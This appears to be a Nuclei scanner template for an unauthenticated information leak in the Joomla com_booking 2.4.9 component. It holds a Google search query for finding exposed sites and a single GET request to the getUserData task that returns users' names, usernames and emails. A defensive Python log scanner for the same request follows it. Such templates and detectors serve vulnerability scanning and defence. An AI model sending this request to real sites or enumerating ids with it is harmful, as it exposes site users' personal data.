Vulnerability Description
The Joomla! com_booking component suffers from an information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems.
id: joomla-com-booking-component
info:
  name: Joomla! com_booking component 2.4.9 - Information Leak
  author: r3Y3r53
  severity: high
  description: |
    Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems.
  reference:
    - https://www.exploit-db.com/exploits/51595
    - http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:"index.php?option=com_booking"
  tags: joomla,info-leak,unauth,vuln
http:
  - raw:
      - |
        GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1
    host-redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":'
          - '"username":'
          - '"email":'
        condition: and
      - type: regex
        part: body
        regex:
          - '^{.*}$'
      - type: word
        part: header
        words:
          - "text/html"
      - type: status
        status:
          - 200
    extractors:
      - type: json
        name: keys
        part: body
        json:
          - 'keys'
# digest: 4b0a00483046022100a6f211644a2c169f11ba2bbff5d821f1fcea290d4819970a7cb8305dfac3bbd7022100fa98eec3f53a87e9c89951ed489cad0c3d9d7ed9616c37fce08468b07ef53b41:922c64590222798bb761d5b6d8e72950
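
A defender-side check for the request this template sends, as an added example that is not part of the original template or the component's code: it scans web access logs for successful calls to the getUserData task and lists which record ids each client retrieved. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/Nginx combined log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1" 200 187 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2024:10:01:03 +0000] "GET /index.php?option=com_booking&controller=customer&task=getUserData&id=124 HTTP/1.1" 200 190 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2024:10:01:04 +0000] "GET /index.php?task=getUserData&id=125&controller=customer&option=com_booking HTTP/1.1" 200 185 "-" "curl/8.0"
203.0.113.9 - - [12/Mar/2024:10:02:00 +0000] "GET /index.php?option=com_booking&view=calendar HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:02:05 +0000] "GET /index.php?option=com_booking&controller=customer&task=getUserData&id=7 HTTP/1.1" 403 12 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def is_get_user_data(target):
    """True if the request target hits the com_booking getUserData task.

    Parameters are matched in any order; values are lowercased so that case
    variants are caught as well (a deliberately broad choice for detection).
    """
    q = parse_qs(urlsplit(target).query)
    first = lambda k: q.get(k, [""])[0].lower()
    return (first("option") == "com_booking"
            and first("controller") == "customer"
            and first("task") == "getuserdata")

def find_exposure(log_text):
    """Map client IP -> sorted record ids it fetched with a 200 response."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, _method, target, status = m.groups()
        if status == "200" and is_get_user_data(target):
            hits[ip].add(parse_qs(urlsplit(target).query).get("id", [""])[0])
    return {ip: sorted(ids) for ip, ids in hits.items()}

if __name__ == "__main__":
    for ip, ids in find_exposure(SAMPLE_LOG).items():
        print(f"{ip} fetched {len(ids)} customer record(s): ids {', '.join(ids)}")
```

A client that retrieves many distinct ids in a short window is the pattern to review first, since each 200 response to this task may have returned another user's name, username and email.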